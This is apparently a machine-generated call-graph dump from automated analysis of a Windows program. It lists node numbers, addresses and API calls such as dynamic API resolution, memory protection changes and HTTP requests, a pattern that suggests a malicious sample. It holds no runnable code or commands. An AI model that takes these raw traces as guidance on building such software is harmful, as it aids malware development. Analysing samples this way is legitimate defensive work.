925f86 13729->13730 13731 911590 lstrcpy 13730->13731 13732 925f9a 13731->13732 13733 915960 34 API calls 13732->13733 13734 925fa0 13733->13734 15349 921170 13734->15349 13828 9145d1 RtlAllocateHeap 13827->13828 13830 914621 VirtualProtect 13828->13830 13830->13476 13832->13563 13835 9110c2 ctype 13833->13835 13834 9110fd 13834->13593 13835->13834 13836 9110e2 VirtualFree 13835->13836 13836->13834 13838 911233 GlobalMemoryStatusEx 13837->13838 13838->13596 13839->13620 13841 92a7c2 13840->13841 13842 92a7ec 13841->13842 13843 92a7da lstrcpy 13841->13843 13842->13625 13843->13842 13845 92a740 lstrcpy 13844->13845 13846 926833 13845->13846 13847 92a9b0 4 API calls 13846->13847 13848 926845 13847->13848 13849 92a8a0 lstrcpy 13848->13849 13850 92684e 13849->13850 13851 92a9b0 4 API calls 13850->13851 13852 926867 13851->13852 13853 92a8a0 lstrcpy 13852->13853 13854 926870 13853->13854 13855 92a9b0 4 API calls 13854->13855 13856 92688a 13855->13856 13857 92a8a0 lstrcpy 13856->13857 13858 926893 13857->13858 13859 92a9b0 4 API calls 13858->13859 13860 9268ac 13859->13860 13861 92a8a0 lstrcpy 13860->13861 13862 9268b5 13861->13862 13863 92a9b0 4 API calls 13862->13863 13864 9268cf 13863->13864 13865 92a8a0 lstrcpy 13864->13865 13866 9268d8 13865->13866 13867 92a9b0 4 API calls 13866->13867 13868 9268f3 13867->13868 13869 92a8a0 lstrcpy 13868->13869 13870 9268fc 13869->13870 13871 92a7a0 lstrcpy 13870->13871 13872 926910 13871->13872 13872->13632 13874 92a812 13873->13874 13874->13635 13876 92a83f 13875->13876 13877 925b54 13876->13877 13878 92a87b lstrcpy 13876->13878 13877->13645 13878->13877 13880 92a8a0 lstrcpy 13879->13880 13881 926443 13880->13881 13882 92a8a0 lstrcpy 13881->13882 13883 926455 13882->13883 13884 92a8a0 lstrcpy 13883->13884 13885 926467 13884->13885 13886 92a8a0 lstrcpy 13885->13886 13887 925b86 13886->13887 13887->13651 13889 9145c0 2 API calls 13888->13889 13890 9126b4 13889->13890 13891 9145c0 2 API calls 13890->13891 13892 9126d7 13891->13892 13893 9145c0 2 API calls 13892->13893 13894 9126f0 13893->13894 13895 9145c0 2 API calls 13894->13895 13896 912709 13895->13896 13897 9145c0 2 API calls 13896->13897 13898 912736 13897->13898 13899 9145c0 2 API calls 13898->13899 13900 91274f 13899->13900 13901 9145c0 2 API calls 13900->13901 13902 912768 13901->13902 13903 9145c0 2 API calls 13902->13903 13904 912795 13903->13904 13905 9145c0 2 API calls 13904->13905 13906 9127ae 13905->13906 13907 9145c0 2 API calls 13906->13907 13908 9127c7 13907->13908 13909 9145c0 2 API calls 13908->13909 13910 9127e0 13909->13910 13911 9145c0 2 API calls 13910->13911 13912 9127f9 13911->13912 13913 9145c0 2 API calls 13912->13913 13914 912812 13913->13914 13915 9145c0 2 API calls 13914->13915 13916 91282b 13915->13916 13917 9145c0 2 API calls 13916->13917 13918 912844 13917->13918 13919 9145c0 2 API calls 13918->13919 13920 91285d 13919->13920 13921 9145c0 2 API calls 13920->13921 13922 912876 13921->13922 13923 9145c0 2 API calls 13922->13923 13924 91288f 13923->13924 13925 9145c0 2 API calls 13924->13925 13926 9128a8 13925->13926 13927 9145c0 2 API calls 13926->13927 13928 9128c1 13927->13928 13929 9145c0 2 API calls 13928->13929 13930 9128da 13929->13930 13931 9145c0 2 API calls 13930->13931 13932 9128f3 13931->13932 13933 9145c0 2 API calls 13932->13933 13934 91290c 13933->13934 13935 9145c0 2 API calls 13934->13935 13936 912925 13935->13936 13937 9145c0 2 API calls 13936->13937 13938 91293e 13937->13938 13939 9145c0 2 API calls 13938->13939 13940 912957 13939->13940 13941 9145c0 2 API calls 13940->13941 13942 912970 13941->13942 13943 9145c0 2 API calls 13942->13943 13944 912989 13943->13944 13945 9145c0 2 API calls 13944->13945 13946 9129a2 13945->13946 13947 9145c0 2 API calls 13946->13947 13948 9129bb 13947->13948 13949 9145c0 2 API calls 13948->13949 13950 9129d4 13949->13950 13951 9145c0 2 API calls 13950->13951 13952 9129ed 13951->13952 13953 9145c0 2 API calls 13952->13953 13954 912a06 13953->13954 13955 9145c0 2 API calls 13954->13955 13956 912a1f 13955->13956 13957 9145c0 2 API calls 13956->13957 13958 912a38 13957->13958 13959 9145c0 2 API calls 13958->13959 13960 912a51 13959->13960 13961 9145c0 2 API calls 13960->13961 13962 912a6a 13961->13962 13963 9145c0 2 API calls 13962->13963 13964 912a83 13963->13964 13965 9145c0 2 API calls 13964->13965 13966 912a9c 13965->13966 13967 9145c0 2 API calls 13966->13967 13968 912ab5 13967->13968 13969 9145c0 2 API calls 13968->13969 13970 912ace 13969->13970 13971 9145c0 2 API calls 13970->13971 13972 912ae7 13971->13972 13973 9145c0 2 API calls 13972->13973 13974 912b00 13973->13974 13975 9145c0 2 API calls 13974->13975 13976 912b19 13975->13976 13977 9145c0 2 API calls 13976->13977 13978 912b32 13977->13978 13979 9145c0 2 API calls 13978->13979 13980 912b4b 13979->13980 13981 9145c0 2 API calls 13980->13981 13982 912b64 13981->13982 13983 9145c0 2 API calls 13982->13983 13984 912b7d 13983->13984 13985 9145c0 2 API calls 13984->13985 13986 912b96 13985->13986 13987 9145c0 2 API calls 13986->13987 13988 912baf 13987->13988 13989 9145c0 2 API calls 13988->13989 13990 912bc8 13989->13990 13991 9145c0 2 API calls 13990->13991 13992 912be1 13991->13992 13993 9145c0 2 API calls 13992->13993 13994 912bfa 13993->13994 13995 9145c0 2 API calls 13994->13995 13996 912c13 13995->13996 13997 9145c0 2 API calls 13996->13997 13998 912c2c 13997->13998 13999 9145c0 2 API calls 13998->13999 14000 912c45 13999->14000 14001 9145c0 2 API calls 14000->14001 14002 912c5e 14001->14002 14003 9145c0 2 API calls 14002->14003 14004 912c77 14003->14004 14005 9145c0 2 API calls 14004->14005 14006 912c90 14005->14006 14007 9145c0 2 API calls 14006->14007 14008 912ca9 14007->14008 14009 9145c0 2 API calls 14008->14009 14010 912cc2 14009->14010 14011 9145c0 2 API calls 14010->14011 14012 912cdb 14011->14012 14013 9145c0 2 API calls 14012->14013 14014 912cf4 14013->14014 14015 9145c0 2 API calls 14014->14015 14016 912d0d 14015->14016 14017 9145c0 2 API calls 14016->14017 14018 912d26 14017->14018 14019 9145c0 2 API calls 14018->14019 14020 912d3f 14019->14020 14021 9145c0 2 API calls 14020->14021 14022 912d58 14021->14022 14023 9145c0 2 API calls 14022->14023 14024 912d71 14023->14024 14025 9145c0 2 API calls 14024->14025 14026 912d8a 14025->14026 14027 9145c0 2 API calls 14026->14027 14028 912da3 14027->14028 14029 9145c0 2 API calls 14028->14029 14030 912dbc 14029->14030 14031 9145c0 2 API calls 14030->14031 14032 912dd5 14031->14032 14033 9145c0 2 API calls 14032->14033 14034 912dee 14033->14034 14035 9145c0 2 API calls 14034->14035 14036 912e07 14035->14036 14037 9145c0 2 API calls 14036->14037 14038 912e20 14037->14038 14039 9145c0 2 API calls 14038->14039 14040 912e39 14039->14040 14041 9145c0 2 API calls 14040->14041 14042 912e52 14041->14042 14043 9145c0 2 API calls 14042->14043 14044 912e6b 14043->14044 14045 9145c0 2 API calls 14044->14045 14046 912e84 14045->14046 14047 9145c0 2 API calls 14046->14047 14048 912e9d 14047->14048 14049 9145c0 2 API calls 14048->14049 14050 912eb6 14049->14050 14051 9145c0 2 API calls 14050->14051 14052 912ecf 14051->14052 14053 9145c0 2 API calls 14052->14053 14054 912ee8 14053->14054 14055 9145c0 2 API calls 14054->14055 14056 912f01 14055->14056 14057 9145c0 2 API calls 14056->14057 14058 912f1a 14057->14058 14059 9145c0 2 API calls 14058->14059 14060 912f33 14059->14060 14061 9145c0 2 API calls 14060->14061 14062 912f4c 14061->14062 14063 9145c0 2 API calls 14062->14063 14064 912f65 14063->14064 14065 9145c0 2 API calls 14064->14065 14066 912f7e 14065->14066 14067 9145c0 2 API calls 14066->14067 14068 912f97 14067->14068 14069 9145c0 2 API calls 14068->14069 14070 912fb0 14069->14070 14071 9145c0 2 API calls 14070->14071 14072 912fc9 14071->14072 14073 9145c0 2 API calls 14072->14073 14074 912fe2 14073->14074 14075 9145c0 2 API calls 14074->14075 14076 912ffb 14075->14076 14077 9145c0 2 API calls 14076->14077 14078 913014 14077->14078 14079 9145c0 2 API calls 14078->14079 14080 91302d 14079->14080 14081 9145c0 2 API calls 14080->14081 14082 913046 14081->14082 14083 9145c0 2 API calls 14082->14083 14084 91305f 14083->14084 14085 9145c0 2 API calls 14084->14085 14086 913078 14085->14086 14087 9145c0 2 API calls 14086->14087 14088 913091 14087->14088 14089 9145c0 2 API calls 14088->14089 14090 9130aa 14089->14090 14091 9145c0 2 API calls 14090->14091 14092 9130c3 14091->14092 14093 9145c0 2 API calls 14092->14093 14094 9130dc 14093->14094 14095 9145c0 2 API calls 14094->14095 14096 9130f5 14095->14096 14097 9145c0 2 API calls 14096->14097 14098 91310e 14097->14098 14099 9145c0 2 API calls 14098->14099 14100 913127 14099->14100 14101 9145c0 2 API calls 14100->14101 14102 913140 14101->14102 14103 9145c0 2 API calls 14102->14103 14104 913159 14103->14104 14105 9145c0 2 API calls 14104->14105 14106 913172 14105->14106 14107 9145c0 2 API calls 14106->14107 14108 91318b 14107->14108 14109 9145c0 2 API calls 14108->14109 14110 9131a4 14109->14110 14111 9145c0 2 API calls 14110->14111 14112 9131bd 14111->14112 14113 9145c0 2 API calls 14112->14113 14114 9131d6 14113->14114 14115 9145c0 2 API calls 14114->14115 14116 9131ef 14115->14116 14117 9145c0 2 API calls 14116->14117 14118 913208 14117->14118 14119 9145c0 2 API calls 14118->14119 14120 913221 14119->14120 14121 9145c0 2 API calls 14120->14121 14122 91323a 14121->14122 14123 9145c0 2 API calls 14122->14123 14124 913253 14123->14124 14125 9145c0 2 API calls 14124->14125 14126 91326c 14125->14126 14127 9145c0 2 API calls 14126->14127 14128 913285 14127->14128 14129 9145c0 2 API calls 14128->14129 14130 91329e 14129->14130 14131 9145c0 2 API calls 14130->14131 14132 9132b7 14131->14132 14133 9145c0 2 API calls 14132->14133 14134 9132d0 14133->14134 14135 9145c0 2 API calls 14134->14135 14136 9132e9 14135->14136 14137 9145c0 2 API calls 14136->14137 14138 913302 14137->14138 14139 9145c0 2 API calls 14138->14139 14140 91331b 14139->14140 14141 9145c0 2 API calls 14140->14141 14142 913334 14141->14142 14143 9145c0 2 API calls 14142->14143 14144 91334d 14143->14144 14145 9145c0 2 API calls 14144->14145 14146 913366 14145->14146 14147 9145c0 2 API calls 14146->14147 14148 91337f 14147->14148 14149 9145c0 2 API calls 14148->14149 14150 913398 14149->14150 14151 9145c0 2 API calls 14150->14151 14152 9133b1 14151->14152 14153 9145c0 2 API calls 14152->14153 14154 9133ca 14153->14154 14155 9145c0 2 API calls 14154->14155 14156 9133e3 14155->14156 14157 9145c0 2 API calls 14156->14157 14158 9133fc 14157->14158 14159 9145c0 2 API calls 14158->14159 14160 913415 14159->14160 14161 9145c0 2 API calls 14160->14161 14162 91342e 14161->14162 14163 9145c0 2 API calls 14162->14163 14164 913447 14163->14164 14165 9145c0 2 API calls 14164->14165 14166 913460 14165->14166 14167 9145c0 2 API calls 14166->14167 14168 913479 14167->14168 14169 9145c0 2 API calls 14168->14169 14170 913492 14169->14170 14171 9145c0 2 API calls 14170->14171 14172 9134ab 14171->14172 14173 9145c0 2 API calls 14172->14173 14174 9134c4 14173->14174 14175 9145c0 2 API calls 14174->14175 14176 9134dd 14175->14176 14177 9145c0 2 API calls 14176->14177 14178 9134f6 14177->14178 14179 9145c0 2 API calls 14178->14179 14180 91350f 14179->14180 14181 9145c0 2 API calls 14180->14181 14182 913528 14181->14182 14183 9145c0 2 API calls 14182->14183 14184 913541 14183->14184 14185 9145c0 2 API calls 14184->14185 14186 91355a 14185->14186 14187 9145c0 2 API calls 14186->14187 14188 913573 14187->14188 14189 9145c0 2 API calls 14188->14189 14190 91358c 14189->14190 14191 9145c0 2 API calls 14190->14191 14192 9135a5 14191->14192 14193 9145c0 2 API calls 14192->14193 14194 9135be 14193->14194 14195 9145c0 2 API calls 14194->14195 14196 9135d7 14195->14196 14197 9145c0 2 API calls 14196->14197 14198 9135f0 14197->14198 14199 9145c0 2 API calls 14198->14199 14200 913609 14199->14200 14201 9145c0 2 API calls 14200->14201 14202 913622 14201->14202 14203 9145c0 2 API calls 14202->14203 14204 91363b 14203->14204 14205 9145c0 2 API calls 14204->14205 14206 913654 14205->14206 14207 9145c0 2 API calls 14206->14207 14208 91366d 14207->14208 14209 9145c0 2 API calls 14208->14209 14210 913686 14209->14210 14211 9145c0 2 API calls 14210->14211 14212 91369f 14211->14212 14213 9145c0 2 API calls 14212->14213 14214 9136b8 14213->14214 14215 9145c0 2 API calls 14214->14215 14216 9136d1 14215->14216 14217 9145c0 2 API calls 14216->14217 14218 9136ea 14217->14218 14219 9145c0 2 API calls 14218->14219 14220 913703 14219->14220 14221 9145c0 2 API calls 14220->14221 14222 91371c 14221->14222 14223 9145c0 2 API calls 14222->14223 14224 913735 14223->14224 14225 9145c0 2 API calls 14224->14225 14226 91374e 14225->14226 14227 9145c0 2 API calls 14226->14227 14228 913767 14227->14228 14229 9145c0 2 API calls 14228->14229 14230 913780 14229->14230 14231 9145c0 2 API calls 14230->14231 14232 913799 14231->14232 14233 9145c0 2 API calls 14232->14233 14234 9137b2 14233->14234 14235 9145c0 2 API calls 14234->14235 14236 9137cb 14235->14236 14237 9145c0 2 API calls 14236->14237 14238 9137e4 14237->14238 14239 9145c0 2 API calls 14238->14239 14240 9137fd 14239->14240 14241 9145c0 2 API calls 14240->14241 14242 913816 14241->14242 14243 9145c0 2 API calls 14242->14243 14244 91382f 14243->14244 14245 9145c0 2 API calls 14244->14245 14246 913848 14245->14246 14247 9145c0 2 API calls 14246->14247 14248 913861 14247->14248 14249 9145c0 2 API calls 14248->14249 14250 91387a 14249->14250 14251 9145c0 2 API calls 14250->14251 14252 913893 14251->14252 14253 9145c0 2 API calls 14252->14253 14254 9138ac 14253->14254 14255 9145c0 2 API calls 14254->14255 14256 9138c5 14255->14256 14257 9145c0 2 API calls 14256->14257 14258 9138de 14257->14258 14259 9145c0 2 API calls 14258->14259 14260 9138f7 14259->14260 14261 9145c0 2 API calls 14260->14261 14262 913910 14261->14262 14263 9145c0 2 API calls 14262->14263 14264 913929 14263->14264 14265 9145c0 2 API calls 14264->14265 14266 913942 14265->14266 14267 9145c0 2 API calls 14266->14267 14268 91395b 14267->14268 14269 9145c0 2 API calls 14268->14269 14270 913974 14269->14270 14271 9145c0 2 API calls 14270->14271 14272 91398d 14271->14272 14273 9145c0 2 API calls 14272->14273 14274 9139a6 14273->14274 14275 9145c0 2 API calls 14274->14275 14276 9139bf 14275->14276 14277 9145c0 2 API calls 14276->14277 14278 9139d8 14277->14278 14279 9145c0 2 API calls 14278->14279 14280 9139f1 14279->14280 14281 9145c0 2 API calls 14280->14281 14282 913a0a 14281->14282 14283 9145c0 2 API calls 14282->14283 14284 913a23 14283->14284 14285 9145c0 2 API calls 14284->14285 14286 913a3c 14285->14286 14287 9145c0 2 API calls 14286->14287 14288 913a55 14287->14288 14289 9145c0 2 API calls 14288->14289 14290 913a6e 14289->14290 14291 9145c0 2 API calls 14290->14291 14292 913a87 14291->14292 14293 9145c0 2 API calls 14292->14293 14294 913aa0 14293->14294 14295 9145c0 2 API calls 14294->14295 14296 913ab9 14295->14296 14297 9145c0 2 API calls 14296->14297 14298 913ad2 14297->14298 14299 9145c0 2 API calls 14298->14299 14300 913aeb 14299->14300 14301 9145c0 2 API calls 14300->14301 14302 913b04 14301->14302 14303 9145c0 2 API calls 14302->14303 14304 913b1d 14303->14304 14305 9145c0 2 API calls 14304->14305 14306 913b36 14305->14306 14307 9145c0 2 API calls 14306->14307 14308 913b4f 14307->14308 14309 9145c0 2 API calls 14308->14309 14310 913b68 14309->14310 14311 9145c0 2 API calls 14310->14311 14312 913b81 14311->14312 14313 9145c0 2 API calls 14312->14313 14314 913b9a 14313->14314 14315 9145c0 2 API calls 14314->14315 14316 913bb3 14315->14316 14317 9145c0 2 API calls 14316->14317 14318 913bcc 14317->14318 14319 9145c0 2 API calls 14318->14319 14320 913be5 14319->14320 14321 9145c0 2 API calls 14320->14321 14322 913bfe 14321->14322 14323 9145c0 2 API calls 14322->14323 14324 913c17 14323->14324 14325 9145c0 2 API calls 14324->14325 14326 913c30 14325->14326 14327 9145c0 2 API calls 14326->14327 14328 913c49 14327->14328 14329 9145c0 2 API calls 14328->14329 14330 913c62 14329->14330 14331 9145c0 2 API calls 14330->14331 14332 913c7b 14331->14332 14333 9145c0 2 API calls 14332->14333 14334 913c94 14333->14334 14335 9145c0 2 API calls 14334->14335 14336 913cad 14335->14336 14337 9145c0 2 API calls 14336->14337 14338 913cc6 14337->14338 14339 9145c0 2 API calls 14338->14339 14340 913cdf 14339->14340 14341 9145c0 2 API calls 14340->14341 14342 913cf8 14341->14342 14343 9145c0 2 API calls 14342->14343 14344 913d11 14343->14344 14345 9145c0 2 API calls 14344->14345 14346 913d2a 14345->14346 14347 9145c0 2 API calls 14346->14347 14348 913d43 14347->14348 14349 9145c0 2 API calls 14348->14349 14350 913d5c 14349->14350 14351 9145c0 2 API calls 14350->14351 14352 913d75 14351->14352 14353 9145c0 2 API calls 14352->14353 14354 913d8e 14353->14354 14355 9145c0 2 API calls 14354->14355 14356 913da7 14355->14356 14357 9145c0 2 API calls 14356->14357 14358 913dc0 14357->14358 14359 9145c0 2 API calls 14358->14359 14360 913dd9 14359->14360 14361 9145c0 2 API calls 14360->14361 14362 913df2 14361->14362 14363 9145c0 2 API calls 14362->14363 14364 913e0b 14363->14364 14365 9145c0 2 API calls 14364->14365 14366 913e24 14365->14366 14367 9145c0 2 API calls 14366->14367 14368 913e3d 14367->14368 14369 9145c0 2 API calls 14368->14369 14370 913e56 14369->14370 14371 9145c0 2 API calls 14370->14371 14372 913e6f 14371->14372 14373 9145c0 2 API calls 14372->14373 14374 913e88 14373->14374 14375 9145c0 2 API calls 14374->14375 14376 913ea1 14375->14376 14377 9145c0 2 API calls 14376->14377 14378 913eba 14377->14378 14379 9145c0 2 API calls 14378->14379 14380 913ed3 14379->14380 14381 9145c0 2 API calls 14380->14381 14382 913eec 14381->14382 14383 9145c0 2 API calls 14382->14383 14384 913f05 14383->14384 14385 9145c0 2 API calls 14384->14385 14386 913f1e 14385->14386 14387 9145c0 2 API calls 14386->14387 14388 913f37 14387->14388 14389 9145c0 2 API calls 14388->14389 14390 913f50 14389->14390 14391 9145c0 2 API calls 14390->14391 14392 913f69 14391->14392 14393 9145c0 2 API calls 14392->14393 14394 913f82 14393->14394 14395 9145c0 2 API calls 14394->14395 14396 913f9b 14395->14396 14397 9145c0 2 API calls 14396->14397 14398 913fb4 14397->14398 14399 9145c0 2 API calls 14398->14399 14400 913fcd 14399->14400 14401 9145c0 2 API calls 14400->14401 14402 913fe6 14401->14402 14403 9145c0 2 API calls 14402->14403 14404 913fff 14403->14404 14405 9145c0 2 API calls 14404->14405 14406 914018 14405->14406 14407 9145c0 2 API calls 14406->14407 14408 914031 14407->14408 14409 9145c0 2 API calls 14408->14409 14410 91404a 14409->14410 14411 9145c0 2 API calls 14410->14411 14412 914063 14411->14412 14413 9145c0 2 API calls 14412->14413 14414 91407c 14413->14414 14415 9145c0 2 API calls 14414->14415 14416 914095 14415->14416 14417 9145c0 2 API calls 14416->14417 14418 9140ae 14417->14418 14419 9145c0 2 API calls 14418->14419 14420 9140c7 14419->14420 14421 9145c0 2 API calls 14420->14421 14422 9140e0 14421->14422 14423 9145c0 2 API calls 14422->14423 14424 9140f9 14423->14424 14425 9145c0 2 API calls 14424->14425 14426 914112 14425->14426 14427 9145c0 2 API calls 14426->14427 14428 91412b 14427->14428 14429 9145c0 2 API calls 14428->14429 14430 914144 14429->14430 14431 9145c0 2 API calls 14430->14431 14432 91415d 14431->14432 14433 9145c0 2 API calls 14432->14433 14434 914176 14433->14434 14435 9145c0 2 API calls 14434->14435 14436 91418f 14435->14436 14437 9145c0 2 API calls 14436->14437 14438 9141a8 14437->14438 14439 9145c0 2 API calls 14438->14439 14440 9141c1 14439->14440 14441 9145c0 2 API calls 14440->14441 14442 9141da 14441->14442 14443 9145c0 2 API calls 14442->14443 14444 9141f3 14443->14444 14445 9145c0 2 API calls 14444->14445 14446 91420c 14445->14446 14447 9145c0 2 API calls 14446->14447 14448 914225 14447->14448 14449 9145c0 2 API calls 14448->14449 14450 91423e 14449->14450 14451 9145c0 2 API calls 14450->14451 14452 914257 14451->14452 14453 9145c0 2 API calls 14452->14453 14454 914270 14453->14454 14455 9145c0 2 API calls 14454->14455 14456 914289 14455->14456 14457 9145c0 2 API calls 14456->14457 14458 9142a2 14457->14458 14459 9145c0 2 API calls 14458->14459 14460 9142bb 14459->14460 14461 9145c0 2 API calls 14460->14461 14462 9142d4 14461->14462 14463 9145c0 2 API calls 14462->14463 14464 9142ed 14463->14464 14465 9145c0 2 API calls 14464->14465 14466 914306 14465->14466 14467 9145c0 2 API calls 14466->14467 14468 91431f 14467->14468 14469 9145c0 2 API calls 14468->14469 14470 914338 14469->14470 14471 9145c0 2 API calls 14470->14471 14472 914351 14471->14472 14473 9145c0 2 API calls 14472->14473 14474 91436a 14473->14474 14475 9145c0 2 API calls 14474->14475 14476 914383 14475->14476 14477 9145c0 2 API calls 14476->14477 14478 91439c 14477->14478 14479 9145c0 2 API calls 14478->14479 14480 9143b5 14479->14480 14481 9145c0 2 API calls 14480->14481 14482 9143ce 14481->14482 14483 9145c0 2 API calls 14482->14483 14484 9143e7 14483->14484 14485 9145c0 2 API calls 14484->14485 14486 914400 14485->14486 14487 9145c0 2 API calls 14486->14487 14488 914419 14487->14488 14489 9145c0 2 API calls 14488->14489 14490 914432 14489->14490 14491 9145c0 2 API calls 14490->14491 14492 91444b 14491->14492 14493 9145c0 2 API calls 14492->14493 14494 914464 14493->14494 14495 9145c0 2 API calls 14494->14495 14496 91447d 14495->14496 14497 9145c0 2 API calls 14496->14497 14498 914496 14497->14498 14499 9145c0 2 API calls 14498->14499 14500 9144af 14499->14500 14501 9145c0 2 API calls 14500->14501 14502 9144c8 14501->14502 14503 9145c0 2 API calls 14502->14503 14504 9144e1 14503->14504 14505 9145c0 2 API calls 14504->14505 14506 9144fa 14505->14506 14507 9145c0 2 API calls 14506->14507 14508 914513 14507->14508 14509 9145c0 2 API calls 14508->14509 14510 91452c 14509->14510 14511 9145c0 2 API calls 14510->14511 14512 914545 14511->14512 14513 9145c0 2 API calls 14512->14513 14514 91455e 14513->14514 14515 9145c0 2 API calls 14514->14515 14516 914577 14515->14516 14517 9145c0 2 API calls 14516->14517 14518 914590 14517->14518 14519 9145c0 2 API calls 14518->14519 14520 9145a9 14519->14520 14521 929c10 14520->14521 14522 929c20 43 API calls 14521->14522 14523 92a036 8 API calls 14521->14523 14522->14523 14524 92a146 14523->14524 14525 92a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14523->14525 14526 92a153 8 API calls 14524->14526 14527 92a216 14524->14527 14525->14524 14526->14527 14528 92a298 14527->14528 14529 92a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14527->14529 14530 92a337 14528->14530 14531 92a2a5 6 API calls 14528->14531 14529->14528 14532 92a344 9 API calls 14530->14532 14533 92a41f 14530->14533 14531->14530 14532->14533 14534 92a4a2 14533->14534 14535 92a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14535 14536 92a4ab GetProcAddress GetProcAddress 14534->14536 14537 92a4dc 14534->14537 14535->14534 14536->14537 14538 92a515 14537->14538 14539 92a4e5 GetProcAddress GetProcAddress 14537->14539 14540 92a612 14538->14540 14541 92a522 10 API calls 14538->14541 14539->14538 14542 92a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14542 14543 92a67d 14540->14543 14541->14540 14542->14543 14544 92a686 GetProcAddress 14543->14544 14545 92a69e 14543->14545 14544->14545 14546 92a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14546 14547 925ca3 14545->14547 14546->14547 14548 911590 14547->14548 15667 911670 14548->15667 14551 92a7a0 lstrcpy 14552 9115b5 14551->14552 14553 92a7a0 lstrcpy 14552->14553 14554 9115c7 14553->14554 14555 92a7a0 lstrcpy 14554->14555 14556 9115d9 14555->14556 14557 92a7a0 lstrcpy 14556->14557 14558 911663 14557->14558 14559 925510 14558->14559 14560 925521 14559->14560 14561 92a820 2 API calls 14560->14561 14562 92552e 14561->14562 14563 92a820 2 API calls 14562->14563 14564 92553b 14563->14564 14565 92a820 2 API calls 14564->14565 14566 925548 14565->14566 14567 92a740 lstrcpy 14566->14567 14568 925555 14567->14568 14569 92a740 lstrcpy 14568->14569 14570 925562 14569->14570 14571 92a740 lstrcpy 14570->14571 14572 92556f 14571->14572 14573 92a740 lstrcpy 14572->14573 14601 92557c 14573->14601 14574 911590 lstrcpy 14574->14601 14575 9252c0 25 API calls 14575->14601 14576 925643 StrCmpCA 14576->14601 14577 9256a0 StrCmpCA 14578 9257dc 14577->14578 14577->14601 14579 92a8a0 lstrcpy 14578->14579 14580 9257e8 14579->14580 14581 92a820 2 API calls 14580->14581 14582 9257f6 14581->14582 14584 92a820 2 API calls 14582->14584 14583 925856 StrCmpCA 14585 925991 14583->14585 14583->14601 14587 925805 14584->14587 14586 92a8a0 lstrcpy 14585->14586 14588 92599d 14586->14588 14589 911670 lstrcpy 14587->14589 14591 92a820 2 API calls 14588->14591 14603 925811 14589->14603 14590 92a820 lstrlen lstrcpy 14590->14601 14592 9259ab 14591->14592 14597 92a820 2 API calls 14592->14597 14593 925a0b StrCmpCA 14594 925a16 Sleep 14593->14594 14595 925a28 14593->14595 14594->14601 14598 92a8a0 lstrcpy 14595->14598 14596 92a740 lstrcpy 14596->14601 14599 9259ba 14597->14599 14600 925a34 14598->14600 14602 911670 lstrcpy 14599->14602 14604 92a820 2 API calls 14600->14604 14601->14574 14601->14575 14601->14576 14601->14577 14601->14583 14601->14590 14601->14593 14601->14596 14606 9251f0 20 API calls 14601->14606 14609 92578a StrCmpCA 14601->14609 14611 92593f StrCmpCA 14601->14611 14612 92a7a0 lstrcpy 14601->14612 14613 92a8a0 lstrcpy 14601->14613 14602->14603 14603->13666 14605 925a43 14604->14605 14607 92a820 2 API calls 14605->14607 14606->14601 14608 925a52 14607->14608 14610 911670 lstrcpy 14608->14610 14609->14601 14610->14603 14611->14601 14612->14601 14613->14601 14615 927553 GetVolumeInformationA 14614->14615 14616 92754c 14614->14616 14617 927591 14615->14617 14616->14615 14618 9275fc GetProcessHeap RtlAllocateHeap 14617->14618 14619 927628 wsprintfA 14618->14619 14620 927619 14618->14620 14622 92a740 lstrcpy 14619->14622 14621 92a740 lstrcpy 14620->14621 14623 925da7 14621->14623 14622->14623 14623->13687 14625 92a7a0 lstrcpy 14624->14625 14626 914899 14625->14626 15676 9147b0 14626->15676 14628 9148a5 14629 92a740 lstrcpy 14628->14629 14630 9148d7 14629->14630 14631 92a740 lstrcpy 14630->14631 14632 9148e4 14631->14632 14633 92a740 lstrcpy 14632->14633 14634 9148f1 14633->14634 14635 92a740 lstrcpy 14634->14635 14636 9148fe 14635->14636 14637 92a740 lstrcpy 14636->14637 14638 91490b InternetOpenA StrCmpCA 14637->14638 14639 914944 14638->14639 14640 914ecb InternetCloseHandle 14639->14640 15682 928b60 14639->15682 14642 914ee8 14640->14642 15697 919ac0 CryptStringToBinaryA 14642->15697 14643 914963 15690 92a920 14643->15690 14646 914976 14648 92a8a0 lstrcpy 14646->14648 14653 91497f 14648->14653 14649 92a820 2 API calls 14650 914f05 14649->14650 14652 92a9b0 4 API calls 14650->14652 14651 914f27 ctype 14655 92a7a0 lstrcpy 14651->14655 14654 914f1b 14652->14654 14657 92a9b0 4 API calls 14653->14657 14656 92a8a0 lstrcpy 14654->14656 14668 914f57 14655->14668 14656->14651 14658 9149a9 14657->14658 14659 92a8a0 lstrcpy 14658->14659 14660 9149b2 14659->14660 14661 92a9b0 4 API calls 14660->14661 14662 9149d1 14661->14662 14663 92a8a0 lstrcpy 14662->14663 14664 9149da 14663->14664 14665 92a920 3 API calls 14664->14665 14666 9149f8 14665->14666 14667 92a8a0 lstrcpy 14666->14667 14669 914a01 14667->14669 14668->13690 14670 92a9b0 4 API calls 14669->14670 14671 914a20 14670->14671 14672 92a8a0 lstrcpy 14671->14672 14673 914a29 14672->14673 14674 92a9b0 4 API calls 14673->14674 14675 914a48 14674->14675 14676 92a8a0 lstrcpy 14675->14676 14677 914a51 14676->14677 14678 92a9b0 4 API calls 14677->14678 14679 914a7d 14678->14679 14680 92a920 3 API calls 14679->14680 14681 914a84 14680->14681 14682 92a8a0 lstrcpy 14681->14682 14683 914a8d 14682->14683 14684 914aa3 InternetConnectA 14683->14684 14684->14640 14685 914ad3 HttpOpenRequestA 14684->14685 14687 914b28 14685->14687 14688 914ebe InternetCloseHandle 14685->14688 14689 92a9b0 4 API calls 14687->14689 14688->14640 14690 914b3c 14689->14690 14691 92a8a0 lstrcpy 14690->14691 14692 914b45 14691->14692 14693 92a920 3 API calls 14692->14693 14694 914b63 14693->14694 14695 92a8a0 lstrcpy 14694->14695 14696 914b6c 14695->14696 14697 92a9b0 4 API calls 14696->14697 14698 914b8b 14697->14698 14699 92a8a0 lstrcpy 14698->14699 14700 914b94 14699->14700 14701 92a9b0 4 API calls 14700->14701 14702 914bb5 14701->14702 14703 92a8a0 lstrcpy 14702->14703 14704 914bbe 14703->14704 14705 92a9b0 4 API calls 14704->14705 14706 914bde 14705->14706 14707 92a8a0 lstrcpy 14706->14707 14708 914be7 14707->14708 14709 